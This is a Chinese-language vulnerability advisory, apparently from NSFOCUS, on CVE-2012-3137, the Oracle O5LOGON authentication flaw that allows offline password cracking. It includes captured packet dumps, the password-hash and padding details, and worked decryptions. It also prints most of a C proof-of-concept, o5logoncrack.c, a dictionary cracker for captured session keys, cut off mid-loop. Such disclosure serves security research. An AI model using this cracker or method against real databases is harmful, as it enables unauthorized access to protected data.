Oracle Database身份验证协议安全限制绕过漏洞(CVE-2012-3137)

NSFOCUS ID:    20847
BUGTRAQ ID:    55651
CVE ID:        CVE-2012-3137
远程漏洞：      是
本地漏洞：      是
漏洞类型：
漏洞影响：      远程攻击者可以密码进行离线密码暴力破解
危险指数：      高
创建时间：      2012-9-27
更新时间：
攻击代码：      无

跟踪工程师：    zz

漏洞概述:

Oracle是一款广泛被使用的商业数据库。

Oracle O5LOGON认证协议存在漏洞，这个漏洞可以使攻击者离线暴力破解Oracle数据库密码，
从而访问受保护的Oracle数据库中的数据。要利用这个漏洞攻击者只需要知道一个合法的
数据库用户名和一个正确的数据库名(SID)，不需要使用中间人攻击。

Martinez Fayo 在2010年5月向Oracle报告了这个问题，Oracle在2011年的中期通过patch
set 11.2.0.3修复了这个漏洞，使用了新版本的协议。但是Oracle没有在 11.1和11.2 中
修复这个问题，因此这些版本仍然存在漏洞。

由于漏洞发生在认证阶段的早期，获取需要的数据后马上断开连接，不会在Oracle数据库
里留下登录日志，因此这个漏洞被称为 “stealth password cracking vulnerability”

细节：

O5LOGON 过程

         send username
Client -----------------------------> Server

         AUTH_SESSKEY  AUTH_VFR_DATA
Client <----------------------------  Server

         AUTH_SESSKEY  AUTH_PASSWORD
Clinet -----------------------------> Server

和这个漏洞相关的两个报文，包含了需要的信息, 如下：

(1) Server -> client

0000   00 f8 00 00 06 00 00 00 00 00 08 02 00 0c 00 00  ................
0010   00 0c 41 55 54 48 5f 53 45 53 53 4b 45 59 60 00  ..AUTH_SESSKEY`.
0020   00 00 60 35 32 46 43 30 34 42 31 46 46 38 31 31  ..`52FC04B1FF811
0030   30 43 41 31 32 36 33 44 46 35 42 43 36 31 41 37  0CA1263DF5BC61A7
0040   45 35 37 37 34 30 43 38 41 35 31 31 31 44 32 32  E57740C8A5111D22
0050   42 34 31 45 35 33 43 43 31 36 37 46 44 46 32 41  B41E53CC167FDF2A
0060   36 38 37 38 39 35 38 32 30 30 44 39 42 32 42 36  6878958200D9B2B6
0070   41 35 31 43 39 35 44 37 37 39 46 44 45 42 41 42  A51C95D779FDEBAB
0080   42 36 39 00 00 00 00 0d 00 00 00 0d 41 55 54 48  B69.........AUTH
0090   5f 56 46 52 5f 44 41 54 41 14 00 00 00 14 34 33  _VFR_DATA.....43
00a0   45 30 42 45 32 30 42 33 32 42 30 42 42 37 36 45  E0BE20B32B0BB76E
00b0   35 37 25 1b 00 00 04 01 00 00 00 02 00 00 00 00  57%.............
00c0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00d0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00e0   00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00  ................
00f0   00 00 00 00 00 00 00 00                          ........

(2) server <- client

0000   03 73 03 d0 1a 05 0a 09 00 00 00 21 01 00 00 44  .s.........!...D
0010   46 bf bf 0d 00 00 00 ec 42 bf bf d8 53 bf bf 03  F.......B...S...
0020   73 79 73 24 00 00 00 0c 41 55 54 48 5f 53 45 53  sys$....AUTH_SES
0030   53 4b 45 59 20 01 00 00 fe 40 46 41 36 44 43 44  SKEY ....@FA6DCD
0040   30 46 33 38 39 45 39 32 44 31 38 46 38 31 38 38  0F389E92D18F8188
0050   45 43 36 39 33 31 33 42 35 32 34 46 34 32 31 31  EC69313B524F4211
0060   38 34 46 41 45 36 37 39 36 31 33 41 37 32 46 43  84FAE679613A72FC
0070   38 44 46 44 30 41 34 43 37 42 20 42 39 33 41 36  8DFD0A4C7B B93A6
0080   41 43 42 38 45 30 35 42 38 32 35 38 41 30 32 30  ACB8E05B8258A020
0090   44 32 39 35 34 45 43 31 42 36 33 00 01 00 00 00  D2954EC1B63.....
00a0   27 00 00 00 0d 41 55 54 48 5f 50 41 53 53 57 4f  '....AUTH_PASSWO
00b0   52 44 c0 00 00 00 40 32 43 35 46 39 35 37 41 36  RD....@2C5F957A6
00c0   35 33 32 41 44 39 31 44 39 31 36 46 34 45 35 46  532AD91D916F4E5F
00d0   41 37 44 32 46 44 41 30 45 36 43 44 46 46 42 41  A7D2FDA0E6CDFFBA
00e0   41 45 44 38 38 33 43 41 46 34 46 32 30 30 43 38  AED883CAF4F200C8
00f0   39 38 33 41 45 33 44 00 00 00 00 18 00 00 00 08  983AE3D.........
0100   41 55 54 48 5f 52 54 54 0f 00 00 00 05 36 36 37  AUTH_RTT.....667
0110   30 38 00 00 00 00 27 00 00 00 0d 41 55 54 48 5f  08....'....AUTH_
0120   43 4c 4e 54 5f 4d 45 4d 0c 00 00 00 04 34 30 39  CLNT_MEM.....409
0130   36 00 00 00 00 27 00 00 00 0d 41 55 54 48 5f 54  6....'....AUTH_T
0140   45 52 4d 49 4e 41 4c 12 00 00 00 06 70 74 73 2f  ERMINAL.....pts/
0150   31 38 00 00 00 00 2d 00 00 00 0f 41 55 54 48 5f  18....-....AUTH_
0160   50 52 4f 47 52 41 4d 5f 4e 4d 51 00 00 00 1b 73  PROGRAM_NMQ....s
0170   71 6c 70 6c 75 73 40 68 65 6e 69 63 65 73 20 28  qlplus@henices (
0180   54 4e 53 20 56 31 2d 56 33 29 00 00 00 00 24 00  TNS V1-V3)....$.
0190   00 00 0c 41 55 54 48 5f 4d 41 43 48 49 4e 45 15  ...AUTH_MACHINE.
01a0   00 00 00 07 68 65 6e 69 63 65 73 00 00 00 00 18  ....henices.....
01b0   00 00 00 08 41 55 54 48 5f 50 49 44 0c 00 00 00  ....AUTH_PID....
01c0   04 36 32 32 38 00 00 00 00 18 00 00 00 08 41 55  .6228.........AU
01d0   54 48 5f 53 49 44 15 00 00 00 07 68 65 6e 69 63  TH_SID.....henic
01e0   65 73 00 00 00 00 18 00 00 00 08 41 55 54 48 5f  es.........AUTH_
01f0   41 43 4c 0c 00 00 00 04 34 34 30 30 00 00 00 00  ACL.....4400....
0200   36 00 00 00 12 41 55 54 48 5f 41 4c 54 45 52 5f  6....AUTH_ALTER_
0210   53 45 53 53 49 4f 4e 6f 00 00 00 25 41 4c 54 45  SESSIONo...%ALTE
0220   52 20 53 45 53 53 49 4f 4e 20 53 45 54 20 54 49  R SESSION SET TI
0230   4d 45 5f 5a 4f 4e 45 3d 27 2b 30 38 3a 30 30 27  ME_ZONE='+08:00'
0240   00 01 00 00 00 45 00 00 00 17 41 55 54 48 5f 4c  .....E....AUTH_L
0250   4f 47 49 43 41 4c 5f 53 45 53 53 49 4f 4e 5f 49  OGICAL_SESSION_I
0260   44 60 00 00 00 20 43 41 41 38 39 33 41 43 30 41  D`... CAA893AC0A
0270   34 33 30 46 41 30 45 30 34 30 30 30 37 46 30 31  430FA0E040007F01
0280   30 31 31 38 35 34 00 00 00 00 30 00 00 00 10 41  011854....0....A
0290   55 54 48 5f 46 41 49 4c 4f 56 45 52 5f 49 44 00  UTH_FAILOVER_ID.
02a0   00 00 00 00 00 00 00                             .......

AUTH_SESSKEY_SRV: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_CLI: FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD   : 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA   : 43E0BE20B32B0BB76E57

Oracle O5LOGON 协议介绍

Oracle 11g password hash 算法为, 用户名 sys, 密码 nsfocus

>>> import hashlib
>>> hashlib.sha1('nsfocus' + '\x43\xE0\xBE\x20\xB3\x2B\x0B\xB7\x6E\x57').hexdigest()
'c3d98762d258d4bd92c572065ddea9af38123f88'

可以在Oracle数据中查询:

SQL> select name, password, spare4 from sys.user$ where name = 'SYS';

NAME                   PASSWORD
------------------------------ ------------------------------
SPARE4
--------------------------------------------------------------------------------
SYS                0F2417000362F55F
S:C3D98762D258D4BD92C572065DDEA9AF38123F8843E0BE20B32B0BB76E57

password hash： C3D98762D258D4BD92C572065DDEA9AF38123F88
salt         ： 43E0BE20B32B0BB76E57

1. client 发送用户名给server
   2 server 判断是否是可用的用户名，如果用户名可用，进入下一步。
2. Server 加密AUTH_SESSKEY, 取出 salt

使用AES192 CBC 加密AUTH_SESSKEY, key为oralce数据库中的20字节的password hash和4个
零(192bit)。

4. Server 将加密的AUTH_SESSKEY和AUTH_VFR_DATA 发送给Client
   AUTH_VFR_DATA 为salt

5. Client计算password hash (通过用户输入的密码), 使用Client计算的password hash
   (加上4个零)为key 使用AES192 CBC算法加密Client AUTH_SESSKEY

6. Client 计算 Combine_SessKey
   将解密的Server AUTH_SESSKEY 和 Client AUTH_SESSKEY的第17个字节开始的24个字节做异
   或，将异或结果的前16字节做MD5, 后8字节做MD5, 得到Combine_SessKey

7. Client 使用 Combine_SessKey 加密用户输入的密码明文，得到 AUTH_PASSWORD
   使用算法为AES192 CBC

8. Client 将加密的Client AUTH_SESSKEY和加密的AUTH_PASSWORD 发送给 Server

9. Server 使用数据库中的 password hash 解密 Client AUTH_SESSKEY

10. Server 尝试解密AUTH_PASSWORD 解密成功则认证通过

参看:
http://www.oxid.it/downloads/oracle_tns_aes192_check.txt

这个漏洞是生成server sesskey 时，在末尾添加了8个0x08, 因为salt已知（由服务器返回
），因此我们只需尝试计算SHA-1的password hash，然后利用这个password hash 去解密
server sesskey， 只要末尾是8个0x08 则说明这是正确的server sesskey，此时使用的密
码为正确的密码，原因是

AES 192 加密块长度为128 bit (16 byte), 分组加密如果明文内容不是块长度的整数倍时
需要填充。填充部分的内容为差的字节数，比如11字节的明文，需要在末尾填充5个0x5

从汇编代码里分析server session key 的生成过程，分析的程序为 Oracle.exe 11.2.0.1.0
oracle.exe调用 oran11.ztvo5ke 加密session key

oran11.ztvo5ke -> oracrypt11.ztceenc -> orancrypt11.ztcen

struct e_key {
    unsigned char s[2];
    unsigned char key[100];
};

struct sess_key {
    uint32_t type;
    unsigned char key[40];
}

struct pwd_hash {
    uint32_t unknown1;
    uint32_t hash_len;
    unsigned char hash[20];
}

ztvo5ke ( e_key*, sess_key*, pwd_hash*, int);

sess_key.type == 0x1492 ( AES 192 )

plaintext 24 + 16 = 40

.text:101BC481                 push    eax        ; unknown structure
.text:101BC482                 push    edx        ; encrypted session key
.text:101BC483                 push    28h        ; length
.text:101BC485                 push    ecx        ; plaintext session key
.text:101BC486                 push    0
.text:101BC488                 push    ebx        ; 0x18
.text:101BC489                 push    87004001h
.text:101BC48E                 call    ztceenc    ; AES 192
.text:101BC493                 add     esp, 1Ch
.text:101BC496                 mov     ebx, eax
.text:101BC498                 test    ebx, ebx
.text:101BC49A                 jnz     short loc_101BC4B8
.text:101BC49C                 lea     edx, [ebp+var_A4]
.text:101BC4A2                 lea     eax, [edi+2]
.text:101BC4A5                 push    eax       ; e_key+2
.text:101BC4A6                 push    [ebp+var_C8]
.text:101BC4AC                 push    edx       ; encryted session key
.text:101BC4AD                 call    ztucbtx

ztceenc 运行前后的情况

0DC3A4E4                                      40 00 00 00                       
0DC3A4F4  00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00..                        
0DC3A504  0C 4A FE 0C 02 00 00 00 FF FF FF FF 13 00 00 00..                        
0DC3A514  02 00 00 00 00 00 00 00 14 00 00 00 14 00 00 00..                     
0DC3A524  44 94 3E 10 00 00 00 00 00 00 00 00 00 00 00 00..                        
0DC3A534  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..                        
0DC3A544  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..                        
0DC3A554  7A EF 5B 9E 89 D3 9F 07 62 A8 83 BB C6 4D 9F D9..                        
0DC3A564  EA 7B 90 1C 49 9B 73 36 BE 60 AF F6 69 A4 ED 37..                        
0DC3A574  8D 1D B3 B7 60 30 C7 56 00 00 00 00 8C A5 C3 0D..                        
0DC3A584  C8 B3 13 21 77 BF F6 84 28 3A D6 54 9F 65 96 0B..                        
0DC3A594  0E 0A E4 60 00 00 00 00 00 00 00 00 00 00 00 00..                        
0DC3A5A4  18 00 00 00 84 A5 C3 0D E0 3E FE 0C A8 46 A7 0C..                     
0DC3A5B4  94 77 FE 0C 0C C6 C3 0D 4A EA 50 01 F4 C4 C3 0D..                        
0DC3A5C4  F8 49 FE 0C 10 FB EC 0D..........................                     
                                                                                
                                                                                
eax = 0DC3A4F0                                                                  
edx = 0DC3A514                                                                  
ecx = 0DC3A554                                                                  
ebx = 0DC3A5A4                                                                  
                                                                                
                                                                                
0DC3A4E4                                      30 00 00 00..                     
0DC3A4F4  00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00..                        
0DC3A504  0C 4A FE 0C 02 00 00 00 FF FF FF FF 13 00 00 00..                        
0DC3A514  61 15 91 7F D6 AE B9 29 00 07 A4 02 A6 B1 2B AA..                        
0DC3A524  BD 3B AA 0C 13 C0 E5 18 8E FE BA AC F5 4C 01 BE.                      
0DC3A534  96 8F 59 0D B9 9E 2C F6 98 74 1F EF 22 CE 17 47..                        
0DC3A544  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..                        
0DC3A554  7A EF 5B 9E 89 D3 9F 07 62 A8 83 BB C6 4D 9F D9..                        
0DC3A564  EA 7B 90 1C 49 9B 73 36 BE 60 AF F6 69 A4 ED 37..                        
0DC3A574  8D 1D B3 B7 60 30 C7 56 00 00 00 00 8C A5 C3 0D..                        
0DC3A584  C8 B3 13 21 77 BF F6 84 28 3A D6 54 9F 65 96 0B..                        
0DC3A594  0E 0A E4 60 00 00 00 00 00 00 00 00 00 00 00 00..                        
0DC3A5A4  18 00 00 00 84 A5 C3 0D E0 3E FE 0C A8 46 A7 0C..                     
0DC3A5B4  94 77 FE 0C 0C C6 C3 0D 4A EA 50 01 F4 C4 C3 0D..                        
0DC3A5C4  F8 49 FE 0C 10 FB EC 0D


0DC3A4F0   30 00 00 00       offset
0DC3A514   61 15 91 7F  ...  encrypted session key (0x30 byte)
0DC3A554   7A EF 5B 9E  ...  plaintext session key (0x28 byte)
0DC3A584   8 B3 13 21   ...  password  hash        (0x18 byte)

AES 192 加密40字节的明文，需要填充 8个 0x08

11.1

PASSWORD:            nsfocus
AUTH_SESSKEY:        43FD38029377C84620AE1851FC1D231409985064DEA0D0B8D48E50E6051751A5D8FDFEAAA9F83B99F37B051FA67F8546
AUTH_SESSKEY_CLIENT: C7248F0873F04B5A02E59178804BD361B0C77B20A4CF685460DA472996D5245745A791DFEA14399831EC62380808903C
AUTH_PASSWORD:       8B4C7D85F421EBA059FDBA21F5708FD4D3BB8AB2168941243B5EF07681F3B80A
AUTH_VFR_DATA:       3DA8A309D636ACF87004

PASSWORD HASH:       EF92924A1DB06441457FDABC24BF89055C8594F7

11.2

PASSWORD    :        nsfocus
AUTH_SESSKEY:        52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_C       FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD        2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA        43E0BE20B32B0BB76E57

PASSWORD HASH:       C3D98762D258D4BD92C572065DDEA9AF38123F88 43E0BE20B32B0BB76E57

aes key
0000 ef 92 92 4a 1d b0 64 41 45 7f da bc 24 bf 89 05
0010 5c 85 94 f7 00 00 00 00

decrypted_server_sesskey
0000 47 43 56 45 1f 61 c7 89 68 83 be ad ed c0 f4 54
0010 e3 dd 61 88 7e 78 d8 9a bc 8f dc 15 4f a6 2f 26
0020 a0 35 e2 63 68 bb 02 1b 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

AUTH_SESSKEY
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

aes key
0000 c3 d9 87 62 d2 58 d4 bd 92 c5 72 06 5d de a9 af
0010 38 12 3f 88 00 00 00 00

decrypted_server_sesskey
0000 21 64 7f ef 76 d3 ee 80 ed 24 47 50 f8 f4 f0 a6
0010 e4 18 a3 2a 40 0b 96 ea 5b 70 26 ab 6a e4 62 f5
0020 81 e0 62 1c 13 a0 21 90 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

AUTH_SESSKEY
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

exploit (POC)

o5logoncrack.c

/* 
11.1

PASSWORD:            nsfocus
AUTH_SESSKEY:        43FD38029377C84620AE1851FC1D231409985064DEA0D0B8D48E50E6051751A5D8FDFEAAA9F83B99F37B051FA67F8546
AUTH_SESSKEY_CLIENT: C7248F0873F04B5A02E59178804BD361B0C77B20A4CF685460DA472996D5245745A791DFEA14399831EC62380808903C
AUTH_PASSWORD:       8B4C7D85F421EBA059FDBA21F5708FD4D3BB8AB2168941243B5EF07681F3B80A
AUTH_VFR_DATA:       3DA8A309D636ACF87004

PASSWORD HASH:       EF92924A1DB06441457FDABC24BF89055C8594F7

11.2

PASSWORD    :           nsfocus
AUTH_SESSKEY:           52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_C          FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD           2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA           43E0BE20B32B0BB76E57

PASSWORD HASH:          C3D98762D258D4BD92C572065DDEA9AF38123F88 43E0BE20B32B0BB76E57

11.x
ED91B97A04000F326F17430A65DACB30CD1EF788E6EC310742B811E32112C0C9CC39554C9C01A090CB95E95C94140C28
40E7B86C99F4BF1D0F17538C22EBCE054F5F677E2B521480F1F56143D047C00469A87049DE1B9CADDC8EA71392AD6E3A
2D4FD970C12D9618742E4525C514105E0BE24DE75C04A0C4BF6DD46BE88A339E
7FD52BC80AA5836695D4
18C314BE125DF23689215C78C33F623AABF1152E


-------------------------------------
aes key
0000 ef 92 92 4a 1d b0 64 41 45 7f da bc 24 bf 89 05
0010 5c 85 94 f7 00 00 00 00

decrypted_server_sesskey
0000 47 43 56 45 1f 61 c7 89 68 83 be ad ed c0 f4 54
0010 e3 dd 61 88 7e 78 d8 9a bc 8f dc 15 4f a6 2f 26
0020 a0 35 e2 63 68 bb 02 1b 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

AUTH_SESSKEY
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

----------------
aes key
0000 c3 d9 87 62 d2 58 d4 bd 92 c5 72 06 5d de a9 af
0010 38 12 3f 88 00 00 00 00

decrypted_server_sesskey
0000 21 64 7f ef 76 d3 ee 80 ed 24 47 50 f8 f4 f0 a6
0010 e4 18 a3 2a 40 0b 96 ea 5b 70 26 ab 6a e4 62 f5
0020 81 e0 62 1c 13 a0 21 90 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

AUTH_SESSKEY
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

------------------
aes key
0000 18 c3 14 be 12 5d f2 36 89 21 5c 78 c3 3f 62 3a
0010 ab f1 15 2e 00 00 00 00

decrypted_server_sesskey
0000 07 eb ab db ee 3a 0e b0 ab e1 9f 68 12 c1 e3 e6
0010 5a e9 fd 7c b9 ca ae e2 fb 21 20 d4 af 83 de 0c
0020 1e 12 dc 01 22 05 a0 75 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 ed 91 b9 7a 04 00 0f 32 6f 17 43 0a 65 da cb 30
0010 cd 1e f7 88 e6 ec 31 07 42 b8 11 e3 21 12 c0 c9
0020 cc 39 55 4c 9c 01 a0 90 cb 95 e9 5c 94 14 0c 28

AUTH_SESSKEY
0000 ed 91 b9 7a 04 00 0f 32 6f 17 43 0a 65 da cb 30
0010 cd 1e f7 88 e6 ec 31 07 42 b8 11 e3 21 12 c0 c9
0020 cc 39 55 4c 9c 01 a0 90 cb 95 e9 5c 94 14 0c 28

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/aes.h>
#include <openssl/md5.h>
#include <openssl/sha.h>
#include "getopt.h"


//*********************************************************************************************************************
// Hashes captured on the network during authentication phase

//unsigned char AUTH_SESSKEY  [] = {  0x43,0xFD,0x38,0x02,0x93,0x77,0xC8,0x46,0x20,0xAE,0x18,0x51,0xFC,0x1D,0x23,0x14,0x09,0x98,0x50,0x64,0xDE,0xA0,0xD0,0xB8,0xD4,0x8E,0x50,0xE6,0x05,0x17,0x51,0xA5,0xD8,0xFD,0xFE,0xAA,0xA9,0xF8,0x3B,0x99,0xF3,0x7B,0x05,0x1F,0xA6,0x7F,0x85,0x46};
//
//unsigned char AUTH_SESSKEY_C[] = {  0xC7,0x24,0x8F,0x08,0x73,0xF0,0x4B,0x5A,0x02,0xE5,0x91,0x78,0x80,0x4B,0xD3,0x61,0xB0,0xC7,0x7B,0x20,0xA4,0xCF,0x68,0x54,0x60,0xDA,0x47,0x29,0x96,0xD5,0x24,0x57,0x45,0xA7,0x91,0xDF,0xEA,0x14,0x39,0x98,0x31,0xEC,0x62,0x38,0x08,0x08,0x90,0x3C};
//
//unsigned char AUTH_PASSWORD [] = {  0x8B,0x4C,0x7D,0x85,0xF4,0x21,0xEB,0xA0,0x59,0xFD,0xBA,0x21,0xF5,0x70,0x8F,0xD4,0xD3,0xBB,0x8A,0xB2,0x16,0x89,0x41,0x24,0x3B,0x5E,0xF0,0x76,0x81,0xF3,0xB8,0x0A };
//
//unsigned char AUTH_VFR_DATA [] = {  0x3D,0xA8,0xA3,0x09,0xD6,0x36,0xAC,0xF8,0x70,0x04 };

//unsigned char AUTH_SESSKEY  [] = { 0x52,0xFC,0x04,0xB1,0xFF,0x81,0x10,0xCA,0x12,0x63,0xDF,0x5B,0xC6,0x1A,0x7E,0x57,0x74,0x0C,0x8A,0x51,0x11,0xD2,0x2B,0x41,0xE5,0x3C,0xC1,0x67,0xFD,0xF2,0xA6,0x87,0x89,0x58,0x20,0x0D,0x9B,0x2B,0x6A,0x51,0xC9,0x5D,0x77,0x9F,0xDE,0xBA,0xBB,0x69 };
//
//unsigned char AUTH_SESSKEY_C[] = { 0xFA,0x6D,0xCD,0x0F,0x38,0x9E,0x92,0xD1,0x8F,0x81,0x88,0xEC,0x69,0x31,0x3B,0x52,0x4F,0x42,0x11,0x84,0xFA,0xE6,0x79,0x61,0x3A,0x72,0xFC,0x8D,0xFD,0x0A,0x4C,0x7B,0xB9,0x3A,0x6A,0xCB,0x8E,0x05,0xB8,0x25,0x8A,0x02,0x0D,0x29,0x54,0xEC,0x1B,0x63 };
//
//unsigned char AUTH_PASSWORD [] = { 0x2C,0x5F,0x95,0x7A,0x65,0x32,0xAD,0x91,0xD9,0x16,0xF4,0xE5,0xFA,0x7D,0x2F,0xDA,0x0E,0x6C,0xDF,0xFB,0xAA,0xED,0x88,0x3C,0xAF,0x4F,0x20,0x0C,0x89,0x83,0xAE,0x3D };
//
//unsigned char AUTH_VFR_DATA [] = {  0x43,0xE0,0xBE,0x20,0xB3,0x2B,0x0B,0xB7,0x6E,0x57 };
//


//unsigned char AUTH_SESSKEY  [] = { 0xED,0x91,0xB9,0x7A,0x04,0x00,0x0F,0x32,0x6F,0x17,0x43,0x0A,0x65,0xDA,0xCB,0x30,0xCD,0x1E,0xF7,0x88,0xE6,0xEC,0x31,0x07,0x42,0xB8,0x11,0xE3,0x21,0x12,0xC0,0xC9,0xCC,0x39,0x55,0x4C,0x9C,0x01,0xA0,0x90,0xCB,0x95,0xE9,0x5C,0x94,0x14,0x0C,0x28 }; 

//unsigned char AUTH_VFR_DATA [] = { 0x7F,0xD5,0x2B,0xC8,0x0A,0xA5,0x83,0x66,0x95,0xD4 }; 

//unsigned char AUTH_SESSKEY  [] = {   0xBD,0x53,0x44,0x89,0x91,0xEE,0xAB,0x1E,0xCD,0x8D,0x32,0xFB,0x59,0x52,0x3F,0x0C,0xBD,0xB3,0x3B,0x40,0xC2,0x8F,0xEB,0xED,0xDD,0x5A,0xA3,0xA4,0xAF,0x0C,0xF6,0xB7,0x23,0x06,0x16,0x2D,0x3F,0x0C,0x1E,0x8D,0xB2,0x53,0x8A,0xF2,0x91,0xEC,0x01,0xA5};

//unsigned char AUTH_VFR_DATA [] = { 0x03,0x1C,0xB4,0x72,0xC4,0xD9,0x04,0x12,0xDD,0x31 }; 

//*********************************************************************************************************************

int HexStringtoBinArray(char* str, unsigned char* array){
    int alen=strlen(str)/2;
    unsigned char t[2];
    unsigned int hexc;
    int j=0;
    int i=0;
    for(;i<strlen(str);i=i+2){
        t[0]=str[i];
        t[1]=str[i+1];
        hexc = t[0]-48;
        if (hexc > 9) hexc-=7;
        array[j]=hexc*16;
        hexc = t[1]-48;
        if (hexc > 9) hexc-=7;
        array[j]+=hexc;
        j++;
    }
    return j;
}

static void hexdump( FILE *f, const char *title, const unsigned char *s,int l) {
    int n = 0;

    fprintf(f, "%s", title);
    for (; n < l; ++n) {
        if ((n % 16) == 0) {
                fprintf(f, "\n%04x", n);
        }
        fprintf(f, " %02x", s[n]);
    }

    fprintf(f, "\n");
}

void ORACLE_MixCase_Hash (char *passwd, int passwd_len, unsigned char salt[10], unsigned char* oracle_mixcase_hash) {
    unsigned char to_hash[256];
    SHA_CTX ctx;

    memcpy (to_hash, passwd, passwd_len);
    memcpy (to_hash+passwd_len, salt, 10);

    SHA1_Init (&ctx);
    SHA1_Update (&ctx, to_hash, passwd_len+10);
    SHA1_Final (oracle_mixcase_hash, &ctx);
}

void ORACLE_TNS_Decrypt_AES192_CBC (unsigned char aes_key_bytes[24], unsigned char* input, int input_len, unsigned char* output) {
    unsigned char iv[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

    AES_KEY key;
    AES_set_decrypt_key(aes_key_bytes, 192, &key);
    AES_cbc_encrypt(input, output, input_len, &key, iv, AES_DECRYPT);
}

void ORACLE_TNS_Encrypt_AES192_CBC (unsigned char aes_key_bytes[24], unsigned char* input, int input_len, unsigned char* output) {
    unsigned char iv[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

    AES_KEY key;
    AES_set_encrypt_key(aes_key_bytes, 192, &key);
    AES_cbc_encrypt(input, output, input_len, &key, iv, AES_ENCRYPT);
}

void usage() {
    fprintf(stdout, "o5logoncrack -k server sesskey -s salt -d dict\n");
    exit(0);
}

int main(int argc, char* argv[]) {

    char password [100];
    char aes_key_bytes[24] = {0};
    char dict_filename[256] = {0};
    unsigned char Oracle_MixCaseHash[20] = {0};
    unsigned char decrypted_server_sesskey[48] = {0};
    unsigned char encrypted_server_sesskey[48] = {0};
    unsigned char AUTH_SESSKEY[48] = {0};
    unsigned char AUTH_VFR_DATA[10] = {0};
    int len;
    int ret;
    int debug = 0;
    FILE * fp = NULL;

    int ch;
    int args = 0;
    while( ( ch = getopt( argc, argv, "k:s:d:v" ) ) != EOF ) {
        switch(ch) {

        case 'k':
            HexStringtoBinArray(optarg, AUTH_SESSKEY);
            break;
        case 's':
            HexStringtoBinArray(optarg, AUTH_VFR_DATA);
            break;
        case 'd':
            strncpy(dict_filename, optarg, 255);
            break;
        case 'v':
            debug = 1;
            break;
        default:
            usage();
        }
        args++;
    }

    if (args < 3) usage();

    printf ("*************************************************************\n");
    printf ("Oracle 11g TNS AES-192 cracker by zz@nsfocus\n");
    printf ("*************************************************************\n\n");

    if ( (fp = fopen(dict_filename, "r")) == NULL ) {
        perror("fail to read");
        exit(1);
    }

    while(fgets(password, 100, fp) != NULL) {

        len = strlen(password);
        if (password[len-1] == 0xa && password[len-2] == 0xd) {
            password[len-2] = '\0';
        }
        else password[len-1] = '\0';

        if (debug)
            fprintf(stdout, "try `%s'\n", password);
        // Create Oracle Hash from the salt (AUTH_VFR_DATA) and the password
        ORACLE_MixCase_Hash (password, strlen (password), AUTH_VFR_DATA, Oracle_MixCaseHash);

